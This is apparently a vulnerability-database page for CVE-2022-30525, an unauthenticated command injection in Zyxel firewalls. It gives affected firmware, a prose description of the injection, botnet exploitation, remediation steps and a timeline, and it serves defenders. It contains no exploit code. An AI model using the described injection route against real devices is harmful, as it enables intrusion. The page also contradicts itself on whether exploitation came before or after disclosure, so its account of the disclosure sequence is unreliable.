What is Zyxel Firewall?
Zyxel is a networking equipment vendor producing firewalls, VPN gateways, and routers widely used by small-to-medium businesses and enterprises. The affected product lines — USG FLEX, ATP, and VPN series — are purpose-built network security appliances providing firewall, IDS/IPS, VPN, and content filtering functions. These devices are typically internet-facing by design, protecting the network perimeter. As security appliances, they represent an especially sensitive attack target: compromising a firewall gives an attacker direct access to the protected internal network with the ability to manipulate traffic, disable protections, and pivot freely.
Overview
CVE-2022-30525 is a critical unauthenticated OS command injection vulnerability (CWE-78, CVSS 9.8) in the CGI program of multiple Zyxel firewall models. An attacker with network access to the device's web management interface can inject arbitrary OS commands that are executed on the underlying Linux operating system with nobody (web server) privileges. Rapid7 researcher Jake Baines discovered and reported the vulnerability. Exploitation was observed in the wild within days of disclosure, including by a Mirai-based botnet that incorporated the vulnerability for large-scale device compromise. CISA added to KEV 4 days after the advisory.
Affected Versions
| Product | Vulnerable Firmware | Fixed Firmware |
|---|---|---|
| USG FLEX 100, 100W, 200, 500, 700 | ZLD 5.00 through 5.21 Patch 1 | ZLD 5.30 |
| USG FLEX 50(W), USG20(W)-VPN | ZLD 5.10 through 5.21 Patch 1 | ZLD 5.30 |
| ATP 100, 200, 500, 700, 800 | ZLD 5.10 through 5.21 Patch 1 | ZLD 5.30 |
| VPN50, VPN100, VPN300, VPN1000 | ZLD 4.60 through 5.21 Patch 1 | ZLD 5.30 |
Technical Details
The vulnerability (CWE-78: OS Command Injection) exists in Zyxel's CGI-based web management interface. The CGI program processes incoming HTTP requests and constructs system commands to perform administrative functions without properly sanitizing user-supplied input.
An unauthenticated attacker can send a crafted HTTP POST request to the CGI endpoint with parameters containing shell metacharacters and injected commands. The CGI process passes these parameters to system functions (such as system()) without escaping, causing the injected commands to be executed by the underlying Linux OS. The web server runs as the nobody user, but the device's limited Linux environment and weak privilege separation often allow escalation to higher privileges through secondary techniques.
Rapid7 noted that Zyxel's initial patch response was to contact them and attempt to negotiate a coordinated disclosure delay — but Rapid7 proceeded with disclosure after Zyxel released the patch, as exploitation had already been observed before the advisory was published.
Discovery
Discovered by Rapid7 security researcher Jake Baines, who reported the vulnerability to Zyxel on April 13, 2022. Rapid7 published a detailed technical write-up on the same day Zyxel released the patch (May 12, 2022), providing exploitation details that enabled rapid weaponization by botnet operators.
Exploitation Context
Within days of Rapid7's disclosure, security researchers observed mass exploitation of CVE-2022-30525 by a Mirai-based botnet. Mirai and its variants specialize in compromising network devices (routers, cameras, firewalls) to incorporate them into distributed denial-of-service (DDoS) botnets.
The rapid weaponization (days from public advisory to active botnet exploitation) is typical of internet-facing network device vulnerabilities and reflects:
- The large number of internet-exposed Zyxel firewalls (tens of thousands searchable on Shodan)
- The simplicity of the exploit (single HTTP request, no authentication)
- Established botnet infrastructure pre-built to scan for and exploit new vulnerabilities
Beyond botnet incorporation, threat actors also exploited this vulnerability for:
- Network perimeter access to protected corporate networks
- Disabling firewall protections to facilitate follow-on attacks
- Installing persistent backdoors on the firewall devices
Remediation
- Upgrade firmware to ZLD 5.30 immediately: Apply the patch via the Zyxel web management console or download from Zyxel's support portal.
- Disable remote management if not needed: Disable web management access from the WAN interface (internet side) if remote administration is not required.
- Restrict management interface access: If remote management is required, restrict access to specific trusted IP addresses using Zyxel's access control features.
- Check for compromise indicators: Review system logs for unexpected administrative actions, configuration changes, or new user accounts that may indicate prior compromise.
- Enable Zyxel SecuReporter: Configure Zyxel's cloud security analytics to provide ongoing monitoring and alerting for anomalous activity.
- Verify firmware integrity: After patching, verify the running firmware version matches the expected Zyxel release and has not been tampered with.
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2022-30525 |
| Vendor / Product | Zyxel — Multiple Firewalls |
| NVD Published | 2022-05-12 |
| NVD Last Modified | 2025-10-27 |
| CVSS 3.1 Score | 9.8 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-78 find similar ↗ |
| CISA KEV Added | 2022-05-16 |
| CISA KEV Deadline | 2022-06-06 |
| Known Ransomware Use | No |
CVSS 3.1 Breakdown
Required Action
Timeline
| Date | Event |
|---|---|
| 2022-04-13 | Rapid7 researcher Jake Baines reported vulnerability to Zyxel |
| 2022-05-12 | Zyxel released patches and published advisory; CVE published |
| 2022-05-12 | Rapid7 published detailed technical analysis |
| 2022-05-16 | CISA added to KEV; active exploitation by Mirai-based botnet observed |
| 2022-06-06 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| NVD — CVE-2022-30525 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |
| Zyxel Security Advisory — OS Command Injection in Firewalls (2022-05-12) | Vendor Advisory |